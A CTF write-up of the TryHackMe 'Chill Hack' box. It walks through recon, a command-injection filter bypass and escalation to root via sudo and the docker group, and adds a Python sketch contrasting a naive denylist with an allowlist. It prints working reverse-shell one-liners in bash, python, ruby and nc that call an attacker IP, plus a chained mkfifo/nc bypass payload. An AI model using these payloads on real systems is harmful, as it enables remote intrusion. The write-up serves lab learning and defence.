CTF-Writeups/TryHackMe/Chill_Hack.md
2020-12-10 00:32:57 +05:00

TryHackMe-Chill Hack

NMAP

```
Nmap scan report for 10.10.244.249
Host is up (0.41s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03 04:33 note.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.2.54.209
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
|   256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_  256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.20 seconds
```

PORT 80

PORT 21

We see from the nmap results that anonymous login on FTP is enabled.

We can only find a note.txt file:

Anurodh told me that there is some filtering on strings being put in the command -- Apaar

By reading this we can assume that there are two users, anurodh and apaar.

Gobuster

Let's do a directory brute force on the web page.

We are presented with a page where we can input something, and it's always good to try some system commands to check whether there is RCE (Remote Code Execution).

So I'll try running the command pwd, which prints the current working directory.

And it does work, so let's try to input a reverse shell command so that we can get our initial foothold. The problem is that the input is filtered: if we try to input something malicious it gets filtered out, like running these reverse shells:

```
bash -i >& /dev/tcp/10.2.54.209/2222 0>&1

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.54.209",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

ruby -rsocket -e'f=TCPSocket.open("10.2.54.209",2222).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc -e /bin/sh 10.2.54.209 4444
```

But if we combine commands together, like

```
pwd;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.54.209 2222 >/tmp/f
```
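The bypass above works because the filter looks at a word, not at what a shell will do with the whole string: once a separator like `;` or `|` is present, everything after it is never inspected. The Python below is an added example, not code from the box or from the original write-up: a constructed stand-in for the filter (assumed to check only the first word, which matches the observed behaviour of bare `bash`/`nc` being rejected while the chained command passes) next to the hardened form, an exact-match allowlist that executes a fixed argv without any shell.

```python
import subprocess

# Constructed stand-in for the box's string filter. The real filter code is not
# in the write-up; checking only the first word is an assumption that reproduces
# what was observed: "bash ..." and "nc ..." rejected, "pwd;...|nc ..." accepted.
BLOCKED_FIRST_WORDS = {"bash", "nc", "python", "python3", "ruby", "sh"}


def denylist_allows(user_input: str) -> bool:
    """Naive denylist: inspect the first whitespace-separated word only.
    Anything chained after ';', '|', '&&' or a newline is never seen."""
    stripped = user_input.strip()
    first = stripped.split(" ", 1)[0] if stripped else ""
    return first not in BLOCKED_FIRST_WORDS


# Hardened form: a fixed allowlist mapping a user-visible name to an argv list.
# Because the argv is passed to subprocess with shell=False, separators and
# redirections inside the input are never interpreted by /bin/sh.
ALLOWED_COMMANDS = {
    "pwd": ["pwd"],
    "uptime": ["uptime"],
}


def allowlist_argv(user_input: str):
    """Return the argv for an exactly allowlisted command, else None."""
    return ALLOWED_COMMANDS.get(user_input.strip())


def allowlist_run(user_input: str) -> str:
    """Execute only an allowlisted command and return its stdout; refuse all else."""
    argv = allowlist_argv(user_input)
    if argv is None:
        raise ValueError("command not permitted: %r" % user_input)
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    chained = "pwd;id"  # constructed sample with the same shape as the bypass
    print("denylist accepts chained input:", denylist_allows(chained))
    print("allowlist output for 'pwd':", allowlist_run("pwd").strip())
    print("allowlist argv for chained input:", allowlist_argv(chained))
```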

We are in the box as www-data.

Running sudo -l tells us what we can run as another user or as root; in this case we can run a file as user apaar.

Now, before running it, let's see what the script does.

So it takes two inputs. The first, $person, means nothing: it can be any random string since it is only printed. The second, $msg, goes to the line $msg 2>/dev/null, so it is executed as a command with any error output sent to /dev/null. We can try running a command like cat local.txt, which is our user flag; basically we can run any command as user apaar.

Try running /bin/sh to see if we get a shell as apaar.

Transfer linpeas to the box.

Running linpeas I didn't find much, but I saw that there are two ports on localhost: 3306, which is MySQL, and 9001, which we can access through SSH port forwarding.

Before doing that, let's generate a public and private key for SSH. For that use ssh-keygen, then copy the contents of id_rsa.pub into authorized_keys.

```
ssh -L 9001:localhost:9001 apaar@10.10.165.124 -i id_rsa
```

After doing that we can visit that port.

Let's visit /var/www.

The SSH port forwarding step wasn't needed, as we could have just grabbed that picture or visited the page /hacker.php, and it's useless to go looking for the MySQL username and password as it is just a rabbit hole. I would say it was a waste of time.

Anyway,

And this archive is password protected, so we have to use a password cracking tool; the one that I use is called fcrackzip.

On reading the extracted source code file we can find a base64 encoded text which could be a user password.

And we are now logged in as anurodh, and we can see that this user is in the docker group.

Looking at privilege escalation for docker on GTFOBins

We are root !!!